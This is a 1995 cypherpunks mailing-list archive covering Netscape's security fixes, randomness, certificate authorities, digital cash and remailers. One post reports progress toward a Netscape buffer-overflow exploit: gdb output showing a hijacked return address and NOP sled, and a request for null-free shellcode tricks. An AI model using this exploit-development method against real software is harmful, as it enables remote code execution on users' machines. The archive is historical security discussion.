I asked Marc about this one, since it bothered me too. Apparently Jared asked Marc if he was aware of specific examples of how this bug might be exploited. Marc replied that we had not seen anything other than what was already posted on cypherpunks. Since the original article did not use quotes, I assume that what was written was a paraphrase, and as such it has been interpreted by the author.

That said, we take this problem seriously, and have taken steps to fix it. The patch that will be released tomorrow will include fixes for this buffer overflow, and others that we found during a review of all of our code. I think it would be more constructive to pound on the new version than one that is known to be busted, and will be patched by tomorrow.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
From eb at comsec.com Tue Sep 26 15:25:03 1995 From: eb at comsec.com (Eric Blossom) Date: Tue, 26 Sep 95 15:25:03 PDT Subject: The Fortezza random number generator is not trustworthy In-Reply-To: <199509232254.PAA11243@ix8.ix.netcom.com> Message-ID: <199509262156.OAA21527@comsec.com> > On a technical note, I would have thought that Fortezza and/or CAPSTONE used > some sort of hardware RNG, i.e. noisy Zener diodes or whatever. I've seen it > mentioned on this list that some other NSA secure phones, such as STU-III, > do that. I was under the impression that a seed for the RNG is loaded into the Fortezza at initialization time. This would make me think that they are using a cryptographically strong PRNG. This would give data that appears random, but is completely determined by the initial state. I suspect that the "seed keys" provided by the two agencies used to program the Clipper chips has the same properties. This makes the question about how does the NSA get access to the key escrow database moot. They don't need access. They know a priori all the unit keys. From ponder at wane-leon-mail.scri.fsu.edu Tue Sep 26 15:31:07 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Tue, 26 Sep 95 15:31:07 PDT Subject: Internet draft on MIME/PGP Message-ID: Don't want to start another MIME war, but thought some on the list might be interested in this. ---------- Forwarded message ---------- Date: Tue, 26 Sep 95 15:10:57 -0400 From:Internet-Drafts at CNRI.Reston.VA.US To: IETF-Announce: ; Subject: I-D ACTION:draft-elkins-pem-pgp-00.txt A New Internet-Draft is available from the on-line Internet-Drafts directories. Title : MIME Security with Pretty Good Privacy (PGP) Author(s) : M. 
Elkins Filename : draft-elkins-pem-pgp-00.txt Pages : 3 Date : 09/25/1995 This document describes how Pretty Good Privacy (PGP) can be used to provide privacy and authentication using the Multipurpose Internet Mail Extensions (MIME) security content types described in RFCXXXX (draft-ietf-pem-sigenc-03.txt). Internet-Drafts are available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-elkins-pem-pgp-00.txt". A URL for the Internet-Draft is: ftp://ds.internic.net/internet-drafts/draft-elkins-pem-pgp-00.txt Internet-Drafts directories are located at: o Africa Address: ftp.is.co.za (196.4.160.8) o Europe Address: nic.nordu.net (192.36.148.17) Address: ftp.nis.garr.it (192.12.192.10) o Pacific Rim Address: munnari.oz.au (128.250.1.21) o US East Coast Address: ds.internic.net (198.49.45.10) o US West Coast Address: ftp.isi.edu (128.9.0.32) Internet-Drafts are also available by mail. Send a message to: mailserv at ds.internic.net. In the body type: "FILE /internet-drafts/draft-elkins-pem-pgp-00.txt". NOTE: The mail server at ds.internic.net can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e., documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. For questions, please mail to Internet-Drafts at cnri.reston.va.us. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. 
From jsw at netscape.com Tue Sep 26 17:26:57 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 17:26:57 PDT
Subject: real randomness for netscape - user clicking mouse
In-Reply-To: <199509270005.UAA16643@frankenstein.piermont.com>
Message-ID: <9509261708.ZM150@tofuhut>

On Sep 26, 8:05pm, Perry E. Metzger wrote:
> > I still think that the low bits of the mouses X and Y positions as the
> > user moves the mouse around the screen are a very good source of random
> > bits for Netscape.
>
> Agreed.

In case it is not clear from our previous postings, our patched version will continually feed position and time of user events through the RNG hash, in addition to any seeding that we do on startup. In the case of X, we use both the X event time from the server, and the current time (based on the highest resolution clock available in the client).

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From perry at piermont.com Tue Sep 26 17:27:37 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 26 Sep 95 17:27:37 PDT
Subject: real randomness for netscape - user clicking mouse
In-Reply-To:
Message-ID: <199509270005.UAA16643@frankenstein.piermont.com>

Vincent Cate writes:
> While it is true that on some versions of X you can watch mouse events on
> other peoples computers, it is also true that on some versions you can
> watch keyboard input.

On my secure systems, when a machine running X has to be on an insecure network, I compile the X server so that it physically lacks the ability to speak to the network -- it does all its IPC via unix domain sockets. However, you are correct that most people don't take precautions like I do.

> At CMU Bennet Yee wrote a program to get peoples
> passwords as they typed them in using X's poor/non-existent security back
> then. This was before xauth.
Xauth isn't secure, as folks have shown. > I still think that the low bits of the mouses X and Y positions as the > user moves the mouse around the screen are a very good source of random > bits for Netscape. Agreed. Perry From jsw at neon.netscape.com Tue Sep 26 17:28:10 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 17:28:10 PDT Subject: Netscape for OS/2, when? (Re: Another Netscape Bug) In-Reply-To: <199509261223.JAA01800@bud.peinet.pe.ca> Message-ID: <44a4kt$jda@tera.mcom.com> In article <199509261223.JAA01800 at bud.peinet.pe.ca>, sentiono at cycor.ca (Sentiono Leowinata) writes: > On Tue, 26 Sep 1995 05:58:19 -0400 (EDT) you wrote: > > >> It's not an exploit script, but you can find an auto crash "animation" > >> for Ray's discovered bug on > >> http://hplyot.obspm.fr/~dl/netscapesec/c1.html > >> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/) > >Crashes the 16-bit Windows version 1.1N. > >DCF > > Same here. For more information (not Netscape related), Web Explorer > 1.02 for OS/2 also crashes for the long URL. > I wish Netscape will port it to OS/2 (already ask them, but no comment > from Netscape). I don't try it on Netscape 1.1N as it doesn't run > reliably under Win-OS/2 (10 min -> crash! ;) My understanding is that OS/2 is supposed to be windows compatible, as in "better Windows than Windows". If our windows app doesn't run on OS/2, then isn't it IBM's bug, not ours? --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From perry at piermont.com Tue Sep 26 17:30:39 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Tue, 26 Sep 95 17:30:39 PDT Subject: cypherpunks press releases/contact list In-Reply-To: <199509261623.AA00939@october.ducktown.org> Message-ID: <199509262341.TAA16602@frankenstein.piermont.com> mkj at october.ducktown.org writes: > For better or worse, in the media we ARE a group, I don't care. Anyone claiming to represent "cypherpunks" will be lying -- at the very least, they will not be representing Tim May, and they will not be representing me. Given that there is no organization, you can't get the organization to agree on anything anyway. If you claim to represent the group, you'll just be lying. No one is going to be representing "Perry Metzger", either. I don't want anyone on earth pretending to represent me, as I'm the only person who can state my views authoritatively. Who gives a damn, anyway? Its not as though we have a "cypherpunks" reputation to uphold. If you want to get associated with something, go out and crack a cryptosystem on your own. Quit thinking "group". Perry From wilcoxb at taussky.cs.colorado.edu Tue Sep 26 17:32:07 1995 From: wilcoxb at taussky.cs.colorado.edu (Bryce Wilcox) Date: Tue, 26 Sep 95 17:32:07 PDT Subject: weak links in DigiCash system Message-ID: <199509262333.RAA01743@taussky.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Jerod, I'm forwarding your message to a couple of lists. I thought you made good points. Of course DigiCash is only running a demo, but still-- why demo poor security? I think it doesn't make a good impression. Bryce, signatures at end - ------- Forwarded Message To: ecash-feedback at digicash.com cc: netherto at taussky.cs.colorado.edu, wilcoxb at taussky.cs.colorado.edu Subject: Security in your ecash project. Date: Tue, 26 Sep 1995 17:00:15 -0600 From: Jerod D Netherton I have a couple of problems/complaints with your ecash project. When I was sent my Acct ID and Passwd they were sent to me plain text instead of being PGP-encrypted first. 
This means that some malicious hacker could have intercepted the e-mail message and stolen the free cyber-bucks you were so generous as to give me. Second, on the WWW-page where one downloads the software it does not seem to do a secure connection between my browser and your server (on netscape there is a small key in the lower-left hand corner that is supposed to show when one is securely connected to a secure server). So someone could sniff my password from the transaction when I GET the software. Also When I'm buying/selling things it would be smart for all parties involved to be using PGP, and I think you should stress this point more in your page. Otherwise this is another vulnerable point in your system IMHO. Thank you for your time. /\ The Scottish Claymore of All CyberSpace UgradLab DumpMeister /\ Watcher of Anime. Addictor to Muds. WebMaster of OAA at CU! < E A N O R JaDuN Comes. Shade and Sweet Water \/ Yuri, Miyu, Nene, Ranma-chan, Ryoko, B-ko! \/ Anime, Chivalry, and Physics Forever!!!! Finger for PGP Key Email:netherto at colorado.edu Phone:(303)786-8311 Pager:(303)610-1203 http://ugrad-www.cs.colorado.edu/~netherto/Home.html Lab:(303)492-6207 - ------- End of Forwarded Message signatures follow To strive, to seek, to find and not to yield. bryce at colorado.edu http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 iQCVAwUBMGiNz/WZSllhfG25AQHFMAQApc6Td8e6bQsBqpCU+EnfbYhueJthyYPS rkHfFrenHNwG/MCEFtwXBBxEQP3yyvnY2qD9RrrhC3cN0HcFw2jE8r++2Y3Z9H7u dJuIKodi2LP8POoW6dJPlW93N5E/+LhuCZvfqe78T2bIl20GIYQ5x0UUTm+APo2f MLu6wUEAHTE= =ofwj -----END PGP SIGNATURE----- From perry at piermont.com Tue Sep 26 17:32:21 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 17:32:21 PDT Subject: cypherpunk press releases vs. 
FAQ
In-Reply-To: <199509262141.OAA24578@netcom8.netcom.com>
Message-ID: <199509270032.UAA16680@frankenstein.piermont.com>

"Vladimir Z. Nuri" writes:
> earlier I advocated a press release mechanism, and this is getting
> flamed to smithereens by the more libertarian/cryptoanarchists
> elements of the group, as I predicted (but geez, accusing me
> of *deliberately* trying to start a flamewar here really hurts
> my feelings! if I were really that mischievous, the meager return would
> be quite an insult to my expertise.. ).

So you admit that you are, in fact, Detweiler. As if there was any doubt.

> what I had in mind was a more FAQ-like cypherpunks document,

There is nothing wrong with Tim's document, which already exists.

Perry

From gorkab at sanchez.com Tue Sep 26 17:33:57 1995
From: gorkab at sanchez.com (Brian Gorka)
Date: Tue, 26 Sep 95 17:33:57 PDT
Subject: Windows MixMaster Client
Message-ID: <00996F95DAD78CE0.0000381E@sanchez.com>

Does anyone out there have a windows mixmaster client? (or a pointer to one?)

Also, I am having a LOT of grief trying to get the alpha.c2.org remailer to work for me... (yes, I have the help files) Could someone walk me through it?

From rfb at lehman.com Tue Sep 26 17:35:26 1995
From: rfb at lehman.com (Rick Busdiecker)
Date: Tue, 26 Sep 95 17:35:26 PDT
Subject: Hack Microsoft?
In-Reply-To: <199509261433.AA11352@ibm.net>
Message-ID: <9509262257.AA28908@cfdevx1.lehman.com>

    Date: Tue, 26 Sep 95 10:33:07 EDT
    From: Dan Bailey

    For fun ways to hack NT, check out http://www.somar.com/security.html.

Thanks for the pointer. The URL is actually http://www.somar.com/security.htm (no `l'), but it's easy to find as a link near the top of http://www.somar.com/

--
Rick Busdiecker
Please do not send electronic junk mail!
net: rfb at lehman.com or rfb at cmu.edu PGP Public Key: 0xDBD9994D www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html send mail, subject "send index" for mailbot info, "send pgp key" gets my key From rah at shipwright.com Tue Sep 26 17:35:38 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Sep 95 17:35:38 PDT Subject: Netscape Stock Prices Message-ID: At 4:45 PM 9/26/95, Jeff Simmons wrote: >Date High Low Close Volume > >950809 75.000 53.750 55.500 3851.8 : : >950925 69.000 62.250 67.000 684.0 WSJ article re: overflow bug Yup. Looks like the old "wall of worry" trick to me. Stand back and let the train go buy folks, madness of crowds and all that. Actually, Netscape is still the only game in town as far as Wall Street goes. What the market needs is a foregone alternative, and some lucky sailor to mistake a tulip bulb for an onion... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From imschira at nyx10.cs.du.edu Tue Sep 26 17:44:32 1995 From: imschira at nyx10.cs.du.edu (Ian M. 
Schirado) Date: Tue, 26 Sep 95 17:44:32 PDT Subject: (fwd) FBI COMPUTER FRAUD WEB SITE DIVISION Message-ID: <9509270000.AA22231@nyx10.cs.du.edu> Path: mnemosyne.cs.du.edu!uunet!in2.uu.net!noc.near.net!das-news2.harvard.edu!oitnews.harvard.edu!newsfeed.rice.edu!news.sesqui.net!news.concom.com!news From: Rick Casimir Newsgroups: misc.forsale.computers.pc-specific.misc Subject: FBI COMPUTER FRAUD WEB SITE DIVISION Date: 21 Sep 1995 17:47:42 GMT Organization: Connections.Com Lines: 9 Message-ID: <43s8fu$r4t at carbon.concom.com> NNTP-Posting-Host: dial139.concom.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 1.1PE (Windows; I; 16bit) HELLO, If you or someone you know who has been scammed or did"nt ship you products after you prepaid or for whatever reason who screwed you. REPORT THEM TO THE FBI: -- -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information To be a skeptic is to refuse to be a victim. "This is my .sig. There are many like it, but this one is mine." Freedom...yeah, right. From jsw at neon.netscape.com Tue Sep 26 17:50:03 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 17:50:03 PDT Subject: New Netscape RNG In-Reply-To: <199509250649.CAA27099@clark.net> Message-ID: <44a728$jda@tera.mcom.com> In article , drc at russell.moore.com (David R. Conrad) writes: > I also noticed that they use $HOME/.pgp/randseed.bin under unix, but > they don't bother with %PGPPATH%\RANDSEED.BIN on PCs. I've sent Jeff > a private message about this. As noted in a previous message, I've replaced the hardcoded randseed.bin with an environment variable that names a file to pass through the seed hash. This is only on the unix version for now, but I plan to put it into the PC version for 2.0. 
--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From karlton at netscape.com Tue Sep 26 17:54:15 1995
From: karlton at netscape.com (karlton)
Date: Tue, 26 Sep 95 17:54:15 PDT
Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <3068A092.31E4@netscape.com>

sameer wrote:
> I haven't seen any mention of this feature in 2.0, so if the
> feature exists in 2.0, then great! Otherwise, unless Netscape is going
> to allow for alternate cert agencies on a specific timescale, I think
> we have to do something about it in order to force the issue.

Netscape has already announced that for 2.0, the user will be able to accept (trust) (or reject) any set of certificate authorities for signing of certificates. I briefly looked for a copy of that announcement, but I could not find it.

PK
--
Philip L. Karlton                karlton at netscape.com
Principal Curmudgeon             http://www.netscape.com/people/karlton
Netscape Communications Corporation

From jya at pipeline.com Tue Sep 26 17:57:49 1995
From: jya at pipeline.com (John Young)
Date: Tue, 26 Sep 95 17:57:49 PDT
Subject: CHA_cha
Message-ID: <199509270057.UAA29759@pipe1.nyc.pipeline.com>

Worth Magazine, October, 1995, has a longish, easy-reading, supportive article on David Chaum and digital cash.

   Virtually alone among E-money thinkers, Chaum insists on creating anonymity for all transactions -- building a tamper-proof system that works just as "real" cash always has, from cowrie shells to $100 bills. The key, he says, is this: Without the spender's say-so, no one should be able to trace who paid whom for what, whether a transaction takes place online or in a swipe of a card at a coffee shop.
It's a libertarian approach in tune with Chaum's roots in freewheeling communities such as Berkeley and Amsterdam -- but it is anathema to control freaks like the FBI, the IRS, and corporate information marketers. Chaum says every digital-cash system but his has the potential to be abused or compromised -- and the math seems to bear him out. His competitors, however, insist their plans will prove plenty secure in practice. They dismiss Chaum as an incorrigible purist, a brilliant mathematician and innovator whose political views are hindering his chances of success. Like many in the digital elite, Chaum, an unabashed utopian, does want to create a new world. To him, electronic money is just the first consumer use of an arcane field he hopes will transform society: cryptology, the science of secret codes. In cyberspace, these codes can prove a powerful way of shielding a person's identity -- or of verifying an identity without giving away extra information. Armed with personal computers and good software, says Chaum, ordinary people will finally have the power to do and say things without being tracked by Big Brother. CHA_cha (31 kb in two parts) From jsw at neon.netscape.com Tue Sep 26 18:01:01 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 26 Sep 95 18:01:01 PDT Subject: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit In-Reply-To: <199509251741.KAA04656@infinity.c2.org> Message-ID: <44a7mr$jda@tera.mcom.com> In article <199509251741.KAA04656 at infinity.c2.org>, sameer at c2.org (sameer) writes: > The really big sticking point I see, however, is the > certification authorities. There is a single point of failure here and > that is at Verisign. This becomes a large problem I think if the en > rypted email that Netscape does requires personal x509 certificates (I > read that Versign is issuing those for $9/each.) 
> This is a problem
> because for one thing I don't think Verisign will want to issue certs
> to pseudonyms, and Netscape may not talk encrypted email to
> non-certified people. (I am not sure)

I believe that the identities of free certificates that verisign plans to offer to netscape customers will not be checked in any way other than to ensure that the name is unique for that CA. You will have to ask someone from Verisign to get a certain answer.

> The solution to this, of course, is to allow Navigator to
> accept alternate certification hierarchies, so we can setup a
> Cypherpunks cert agency or a c2.org cert agency, which -will- sign
> nym's keys, etc. The question exists though, as to whether or not
> Netscape will allow for alternate agencies in Navigator.

I have stated here, and in other public forums, several times in the past few months, that Netscape Navigator 2.0 will support user configurable certificate authorities. You will be able to specify that you do or do not trust specific server certificates and certificate authorities. The user will be able to incorporate new CA certificates into their certificate database, and mark them as trusted for signing certs for SSL, email, etc.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From blancw at accessone.com Tue Sep 26 19:00:33 1995
From: blancw at accessone.com (blancw at accessone.com)
Date: Tue, 26 Sep 95 19:00:33 PDT
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
Message-ID: <9509270202.AA17457@accessone.com>

From: "Perry E. Metzger"

There is this widespread and wholly misplaced affection for "cypherpunks". We aren't a company or an organization. This is a mailing list, and occasionally a seminar series in places like NoCal. It isn't a "group".
..............................................
And you of all the cpunks, Perry, are the most affectionately considered. :>) Actually, those who want to become official spokewheels should consider that the cypherpunk agenda is to promote anarchic (i.e. individualistic, self-responsible) action. That is, that the individual who chooses to act in a 'cypherpunkish' mode does so at their own risk by their own motivation by their own decision and their own discretion. Not everyone on the list subscribes to this ideal of complete independence; furthermore, for anarchist types to identify with a "group" would be inconsistent with the philosophical attitude of the "members", who come-&-go as they please. However, it would be an amazing event to see VZ Nuri-logical (Cypherpunk Extraordinaire) on TV, saying something like, "Yes, I fully and completely subscribe to the Cypherpunk agenda: black markets, anarchy, overthrow of governments. National borders are just speed bumps on the information superhighway." (It would be a *cold* day in Hell!) .. Blanc From rjc at clark.net Tue Sep 26 20:38:18 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 20:38:18 PDT Subject: Status of Netscape Bug Exploit (suggestions needed) Message-ID: <199509270338.XAA09600@clark.net> Ok Folks, here's what I got so far... 
1) a URL that can place a specific value in the program counter

(gdb) select-frame 2
(gdb) info frame
Stack level 2, frame at 0xefbfbc30:
 eip = 0xefbfbc30; saved eip 0x90909090
                             ^^^^^^^^^^^^^^^^
 called by frame at 0x90909090, caller of frame at 0xefbfbc14
 Arglist at 0xefbfbc30, args:
 Locals at 0xefbfbc30, Previous frame's sp is 0xefbfbc1c
 Saved registers:
  eax at 0xefbfbc2c, ecx at 0xefbfbc28, edx at 0xefbfbc24, ebx at 0xefbfbc20,
  ebp at 0xefbfbc18, esi at 0xefbfbc14, edi at 0xefbfbc10, eip at 0xefbfbc0c,
  ps at 0xefbfbc08

2) A piece of exploit code on the stack near the PC

(gdb) disassemble 0xefbfbc10 0xefbfbc40
0xefbfbc27: nop
0xefbfbc28: nop
0xefbfbc29: nop
0xefbfbc2a: nop
0xefbfbc2b: nop
0xefbfbc2c: nop
0xefbfbc2d: nop
0xefbfbc2e: nop
0xefbfbc2f: nop
0xefbfbc30: nop
0xefbfbc31: nop
0xefbfbc32: nop
0xefbfbc33: nop
0xefbfbc34: nop
0xefbfbc35: nop
0xefbfbc36: nop
0xefbfbc37: nop
0xefbfbc38: nop
0xefbfbc39: nop
0xefbfbc3a: nop
0xefbfbc3b: nop
0xefbfbc3c: nop
0xefbfbc3d: nop
0xefbfbc3e: nop
0xefbfbc3f: nop
0xefbfbc40: nop

3) exploit code that calls the kernel syscall() with SYS_exit (benign exploit, causes your browser to exit)

The problem? To make a syscall under BSDI2.0, I have to execute an lcall 0x7,0x0 with 1,0 on the stack. However, to exploit the netscape bug, you can not embed 0x0 in the URL. No problem I thought, I searched Netscape's executable for any kernel calls, and found an lcall 0x7,0x0 at 0x257fee. But I can't do a 32-bit direct jump without a zero, in the instruction (the 32-bit address is 0x00257fee), and I can't do a relative jump from 0xefbfbc30+ If you can come up with some 386 assembly under BSDI2.0 which can invoke syscall() in the kernel without any embedded 0x0 bytes in the code, you can share a Hack Netscape T-Shirt with me. If it turns out to be too hard under BSDI, I'll gladly assist in producing exploits for Windows or another operating system.
One trick I thought up for embedding zeros in the code is to self-modify the code using XOR ADDRESS,ADDRESS where ADDRESS is a byte on the stack within the code. Anyone have any better ones? -Ray

From nobody at armadillo.com Tue Sep 26 21:02:15 1995 From: nobody at armadillo.com (Anonymous Remailing Service) Date: Tue, 26 Sep 95 21:02:15 PDT Subject: Time Keys, Some Secure Ideas (by Alias: Jay Hyden) Message-ID: <199509270256.VAA09199@monad.armadillo.com> -----BEGIN PGP SIGNED MESSAGE----- >> Time Keys, Some Secure Ideas << The weakest attack on a time key based system is to spoof the computer that keeps track of time into releasing encryption keys i.e. change the clock. Perhaps this could be avoided by hardware inaccessibility, say a computer system taken to, and set up on the Moon by those corporations that are already planning to place VR rovers on the lunar surface. Any Earth bound system would be vulnerable to physical attack. Here are some ideas for such a system:

o 7 clocks with absolutely no way of resetting them. Perhaps a system that will only let you tell it which clock is the most accurate, and only if you prove you are the proper authority and only if 4 other clocks are on the same minute.

o Redundant hardware and power collection and data transmit /receive systems, flash ROM hard drives for storing secret keys and necessary programs and files. Built to last several centuries if possible.

o Key pairs could be generated on Earth, a time of release instruction and perhaps an optional other public key a (return at future date encrypted with this key option.) The package is then encrypted with one of the lunar systems keys, then transmitted to the Moon. A verification could be encrypted and sent back to insure data integrity.

o Other security checks in place would insure that the data was transmitted to the Moon by the proper authority, i.e. the Corp. charging for this service.
Additional backup logic that would insure that proper power and protocol exist for transmissions from the lunar system.

o The key pairs are witness generated, then sent to the lunar system, then the secret key is destroyed on Earth. The public keys become a one way hash to the future until the time designated by the key's owner has elapsed. Then the lunar system would transmit the owner's secret key to Earth.

o Upon time released instructions the lunar system would transmit the secret key, (encrypted if optioned) upon demand by a known packet radio method. So if the Corp. authority did not exist in say, 100 years, the data could still be retrieved by standard packet radio. People who want to write to ONLY their great great grand-children or the future world in general would have a forum.

Jay

( End HEMP Prohibition! This is an open challenge to Historians. Name examples of where & when the cultivation of legal hemp was harmful or destructive to a society in any way! PublicKey on Servers )
From rrothenb at ic.sunysb.edu Tue Sep 26 21:09:20 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Tue, 26 Sep 95 21:09:20 PDT Subject: PGP and FBI? Message-ID: <199509270409.AAA00688@libws4.ic.sunysb.edu> There's some sort of documentary on WBAI 99.5 FM out of NYC now. They're talking about PGP and right wing militias... the guy being interviewed called PGP a "one time pad system" and doesn't understand it... *sigh*

From scmayo at rschp2.anu.edu.au Tue Sep 26 21:23:28 1995 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Tue, 26 Sep 95 21:23:28 PDT Subject: chaos cryptography Message-ID: <9509270423.AA03675@toad.com> Hi all - saw this in New Scientist and thought you might be interested (I guess it's more stenography than cryptography): ========== "Secret signals hidden in chaos ...John Hogan of the Engineering Mathematics department at Bristol showed the BA how such unpredictable systems can be used to protect sensitive information. His team mixed the information with chaotic electrical signals, transmitted the result, and then extracted the hidden message. Hogan and his team modified simple electrical circuits to generate unpredictable signals and hid within them a recording of "Land of Hope and Glory". When the two identical circuits are connected, said Hogan, the outputs instantly synchronise so that anything added to the transmission stands out. "It's like magic." he said.
If anyone intercepted the signal and fed it through a loudspeaker all they would hear is a loud hiss. This makes the system suitable for hiding confidential information - once, that is, the system is perfected. At present, a decoded message sounds like a scratchy 78 recording although it is still recognisable, said Hogan. So far the researchers have succeeded only when the two circuits are connected by wire a few cm long. They are now trying to replicate the results in circuits that are separated by long distances and connected by a radio link. They also want to see if it can be modified for use with digital equipment." ============ Sherry ps I wonder how close to real noise the "hiss" is.

From grafolog at netcom.com Tue Sep 26 21:47:49 1995 From: grafolog at netcom.com (Jonathan Blake) Date: Tue, 26 Sep 95 21:47:49 PDT Subject: Fax encryption software Message-ID: I saw this article in alt.privacy. Anybody think the described encryption actually is worth looking at? Xref: netcom.com alt.privacy:29325 Path: netcom.com!ix.netcom.com!howland.reston.ans.net!EU.net!uunet!in2.uu.net!news.deltanet.com!lkf0166 From: clav at deltanet.com Newsgroups: alt.privacy Subject: Re: FAX Encryption Software Date: Mon, 18 Sep 95 12:39:53 GMT Organization: Delta Internet Services, Anaheim, CA Lines: 59 Message-ID: <43k3nv$m9 at news1.deltanet.com> References: <43hvft$n2b at news1.deltanet.com> <43ii1t$210 at nntp.crl.com> NNTP-Posting-Host: lkf0166.deltanet.com X-Newsreader: News Xpress Version 1.0 Beta #3 Dear Mr. Chaos, We are talking about a 72 bit engine that is more than sufficiently strong for time sensitive general business purposes. In addition it does not rely merely on simple factoring but a process called graphical encryption that adds additional difficulty to an attack. I would like to see if your cracking abilities are anywhere near your abilities to return an uninformed answer. I invite you to try your skill.
David __________________________________________________________________ In article <43ii1t$210 at nntp.crl.com>, acollier at crl.com wrote: >clav at deltanet.com wrote: > >>ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY >>SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE??? > >>Aliroo Ltd. has developed a Windows, eye-to-eye fax/email >>encryption package called PrivaSoft. > >>Unlike any previously devised system, this method protects, with >>only 4 mouse clicks, fax and email transmissions in electronic >>and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT >>IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. > >>You can encrypt a message, and then fax or email it (via plain >>old standard fax machine or fax modem), print it to paper or save >>to a disk file. > >>It is fully licensed, without restriction for export, by the U.S. >>Department of Commerce. NO PGP WORRIES. > >Also no worries about security - if DOC says you can have it, you can bet >that NSA has seen to it that it is cryptographically weak, or else uses a >key escrow system (where somebody else can get to the keys), and as insecure >as any other non-published method. For all we know, they may be using a >cereal box decoder ring set up. > >>Email me for a free copy which will be sent to you via email or >>snail mail post. It is fully functional (not crippleware) and >>enables you to try our system out before purchase with 8 free >>page scrambles. It retails for $130 per installed computer. >>Looking for end users and distributors.
> >>Thanks, >>David > > -- To subscribe to Graphology-L send e-mail to: listserv at netcom.com / subject: leave blank message: subscribe graphology-l at netcom.com To get the Graphology-L FAQ send e-mail to grafolog at netcom.com / subject: hwafaq / no message ^

From jcaldwel at iquest.net Tue Sep 26 22:17:27 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Tue, 26 Sep 95 22:17:27 PDT Subject: Yet Another Alarmist TV Show About Child Molesters on the Ne Message-ID: On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote: It's called the Hegelian Diclectic(sp?) first postulated by William Hegel (an ass) in Germany approx the 1600's as a method for social change when none could otherwise be achieved. > And the trashing will continue. It is the classic scenario. > Feed the media negative press clips about the entity you wish > to discredit (here, the Net), e.g.: > 1. All those pedophiles out to lure your children; > 2. Big coverage on catching some of those pedophiles; > 3. First page coverage on breaking Netscape's code with the > headlines that your sensitive information such as your > credit card numbers, etc. can be retrieved (ignoring that > the reason was to show Netscape's poorly structured code > would allow this and, therefore, preventing it before it > could happen); > 4. Expect cryptology to crop up in the Oklahoma bombing trial. > There have already been articles of those involved having > allegedly used that *damned* Net to correspond.

From tcmay at got.net Tue Sep 26 22:32:35 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 26 Sep 95 22:32:35 PDT Subject: chaos cryptography Message-ID: >Hi all - saw this in New Scientist and thought you might be interested >(I guess it's more stenography than cryptography): ^^^^^^^^^^^ Yes, chaotic communication is preferred by secretaries around the world. They follow their dictates. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway."

From inglem at adnetsol.com Tue Sep 26 22:53:38 1995 From: inglem at adnetsol.com (Mike Ingle) Date: Tue, 26 Sep 95 22:53:38 PDT Subject: Coercion-proof remailers (solved?) Message-ID: <199509270552.WAA00475@cryptical.adnetsol.com> For a while I've been talking about the importance of a robust infrastructure for anonymity, including coercion-resistant remailers. Here is an approach that appears to eliminate the problem of after-the-fact coercion.

